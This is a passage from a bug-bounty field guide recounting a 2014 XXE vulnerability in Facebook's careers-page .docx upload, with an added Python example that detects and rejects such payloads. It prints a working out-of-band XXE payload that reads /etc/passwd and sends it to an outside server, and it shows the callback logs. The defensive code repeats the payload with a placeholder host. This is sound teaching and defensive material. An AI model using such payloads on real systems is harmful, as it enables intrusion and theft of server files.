Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski


Author: Peter Yaworski
Language: eng
Format: epub, mobi
Publisher: No Starch Press, Inc.
Published: 2019-12-15T00:00:00+00:00


Takeaways

Even big companies can make mistakes. Whenever a site accepts XML, no matter who owns the site, always test for XXE vulnerabilities. Reading the /etc/passwd file is a good way to demonstrate a vulnerability’s impact on companies.

Facebook XXE with Microsoft Word

Difficulty: Hard

URL: https://facebook.com/careers/

Source: Attack Secure Blog

Date reported: April 2014

Bounty paid: $6,300

This Facebook XXE is a little more challenging than the previous example because it involves remotely calling a server. In late 2013, Facebook patched an XXE vulnerability discovered by Reginaldo Silva. Silva immediately reported the XXE to Facebook and asked for permission to escalate it to a remote code execution (a type of vulnerability covered in Chapter 12). He believed a remote code execution was possible because he could read most files on the server and open arbitrary network connections. Facebook investigated and agreed, paying him $30,000.

As a result, Mohamed Ramadan challenged himself to hack Facebook in April 2014. He didn’t think another XXE was a possibility until he found Facebook’s careers page, which allowed users to upload .docx files. The .docx file type is just an archive for XML files. Ramadan created a .docx file, opened it with 7-Zip to extract its contents, and inserted the following payload into one of the XML files:

<!DOCTYPE root [
➊ <!ENTITY % file SYSTEM "file:///etc/passwd">
➋ <!ENTITY % dtd SYSTEM "http://197.37.102.90/ext.dtd">
➌ %dtd;
➍ %send;
]>

If the target has external entities enabled, the XML parser will evaluate the %dtd; ➌ entity, which makes a remote call to Ramadan’s server http://197.37.102.90/ext.dtd ➋. That call would return the following, which is the contents of the ext.dtd file:

➎ <!ENTITY send SYSTEM 'http://197.37.102.90/FACEBOOK-HACKED?%file;'>

First, %dtd; would reference the external ext.dtd file and make the %send; entity available ➎. Next, the parser would parse %send; ➍, which would make a remote call to http://197.37.102.90/FACEBOOK-HACKED?%file; ➎. The %file; references the /etc/passwd file ➊, so its contents would replace %file; in the HTTP request ➎.

Calling a remote IP to exploit an XXE isn’t always necessary, although it can be useful when sites parse remote DTD files but block access to reading local files. This is similar to a server-side request forgery (SSRF), which was discussed in Chapter 10. With an SSRF, if a site blocks access to internal addresses but allows calls to external sites and follows 301 redirects to internal addresses, you can achieve a similar result.
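As an added defensive example (not code from the book, and not Facebook’s own upload handler), the following Python uses only the standard library to do what a .docx upload endpoint should do before trusting the archive: unzip it, refuse any XML part that carries a DOCTYPE or ENTITY declaration (OOXML parts never need one), and parse the remaining parts with expat configured so that parameter entities like %dtd; and external entities are never resolved. The archive layout, the two sample parts, and the placeholder host attacker.example are constructed for the demonstration; the malicious part mirrors the shape of the payload above.

```python
import io
import re
import zipfile
import xml.parsers.expat

# Constructed sample parts for a minimal .docx-shaped archive. A real .docx has
# many more parts; two are enough to exercise the checks.
BENIGN_DOCUMENT_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    b'<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>'
)

# Same shape as the parameter-entity payload in the text, with the placeholder
# host attacker.example standing in for a real address. Constructed for the test.
MALICIOUS_DOCUMENT_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE root ['
    b'<!ENTITY % file SYSTEM "file:///etc/passwd">'
    b'<!ENTITY % dtd SYSTEM "http://attacker.example/ext.dtd">'
    b'%dtd;'
    b']>'
    b'<root/>'
)

CONTENT_TYPES_XML = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>'
)

# Any DOCTYPE or ENTITY declaration is out of place in an OOXML part.
DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def build_docx(document_xml):
    """Assemble an in-memory zip archive shaped like a .docx (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES_XML)
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def find_dtd_parts(docx_bytes):
    """Return the names of XML parts that carry a DOCTYPE or ENTITY declaration."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.lower().endswith((".xml", ".rels")) and DTD_MARKER.search(z.read(name)):
                flagged.append(name)
    return flagged


def parse_part_safely(xml_bytes):
    """Parse one XML part with expat set to reject DTDs and external entities.

    Returns (ok, payload): on success payload is the list of element names seen,
    on rejection it is the reason. Parameter-entity resolution is switched off so
    a %dtd;-style reference is never fetched, and the handlers abort the parse on
    any DOCTYPE or external entity reference.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    names = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE declaration rejected (root %r)" % name)

    def on_external_entity(context, base, sysid, pubid):
        raise ValueError("external entity reference rejected (%r)" % sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    try:
        parser.Parse(xml_bytes, True)
    except (ValueError, xml.parsers.expat.ExpatError) as exc:
        return False, str(exc)
    return True, names


def check_upload(docx_bytes):
    """Gate for an uploaded .docx: byte-level scan first, then a safe parse of every part."""
    flagged = find_dtd_parts(docx_bytes)
    if flagged:
        return False, "DTD declarations in parts: %s" % ", ".join(flagged)
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.lower().endswith((".xml", ".rels")):
                ok, payload = parse_part_safely(z.read(name))
                if not ok:
                    return False, "%s: %s" % (name, payload)
    return True, "no DTD or external entities found"


if __name__ == "__main__":
    print(check_upload(build_docx(BENIGN_DOCUMENT_XML)))
    print(check_upload(build_docx(MALICIOUS_DOCUMENT_XML)))
```

The two layers are deliberate: the regex scan catches the declaration cheaply without ever handing the bytes to a parser, and the expat configuration is the backstop for any part that slips past it, since with parameter-entity parsing disabled and the DOCTYPE handler raising, neither the local file nor the remote DTD is ever requested.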

Next, Ramadan started an HTTP server on his machine with Python’s SimpleHTTPServer to receive the call and its content:

Last login: Tue Jul 8 09:11:09 on console
➊ Mohamed:~ mohaab007$ sudo python -m SimpleHTTPServer 80
Password:
➋ Serving HTTP on 0.0.0.0 port 80...
➌ 173.252.71.129 - - [08/Jul/2014 09:21:10] "GET /ext.dtd HTTP/1.0" 200 -
173.252.71.129 - - [08/Jul/2014 09:21:11] "GET /ext.dtd HTTP/1.0" 200 -
173.252.71.129 - - [08/Jul/2014 09:21:11] code 404, message File not found
➍ 173.252.71.129 - - [08/Jul/2014 09:21:10] "GET /FACEBOOK-HACKED? HTTP/1.0" 404

At ➊ is the command to start Python SimpleHTTPServer, which returns the message "Serving HTTP on 0.0.0.0 port 80..." at ➋. The terminal waits until it receives an HTTP request to the server. At first, Ramadan didn’t receive a response, but he waited until he finally got a remote call at ➌ to retrieve the /ext.
